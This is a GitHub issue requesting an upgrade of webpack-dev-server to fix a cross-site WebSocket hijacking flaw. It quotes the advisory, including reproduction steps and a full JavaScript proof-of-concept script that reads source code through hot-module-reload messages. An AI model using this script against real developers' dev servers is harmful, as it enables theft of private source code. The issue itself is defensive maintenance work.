[Dependency]: Address webpack-dev-server security issues #765
Description
Dependency
webpack-dev-server
Current Version
4.15.2
Target Version
5.2.1
Reason
Security vulnerability
Breaking Changes
Summary
Source code may be stolen when you access a malicious web site with non-Chromium based browser.
Details
The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by https://github.com/advisories/GHSA-cf66-xwfp-gvc4.
But webpack-dev-server always allows IP address Origin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in [the article](https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages) linked from https://github.com/advisories/GHSA-cf66-xwfp-gvc4, the attacker get the source code.
related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.
This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to [the non-HTTPS private access blocking feature](https://developer.chrome.com/blog/private-network-access-update#chrome_94).
PoC
Download [reproduction.zip](https://github.com/user-attachments/files/18418233/reproduction.zip) and extract it
Run npm i
Run npx webpack-dev-server
Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
Edit src/index.js in the extracted directory
You can see the content of src/index.js
image
The script in the POC site is:
window.webpackHotUpdate = (...args) => {
console.log(...args);
for (i in args[1]) {
document.body.innerText = args[1][i].toString() + document.body.innerText
console.log(args[1][i])
}
}
let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
console.log(event.data);
if (event.data.match('"type":"ok"')) {
s = document.createElement('script');
s.src = `${target}${file}.${currentHash2}.hot-update.js`;
document.body.appendChild(s)
}
r = event.data.match(/"([0-9a-f]{20})"/);
if (r !== null) {
currentHash2 = currentHash;
currentHash = r[1];
console.log(currentHash, currentHash2);
}
}
Impact
This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.
Testing
- Run the tests
- Try running the dev server
- Try smoke testing the application
Priority
Critical (Security fix)
Checklist
- I have reviewed the changelog for breaking changes
- I have identified all affected code areas
- I have a rollback plan if issues arise
Metadata
Metadata
Assignees
Type
Projects
Status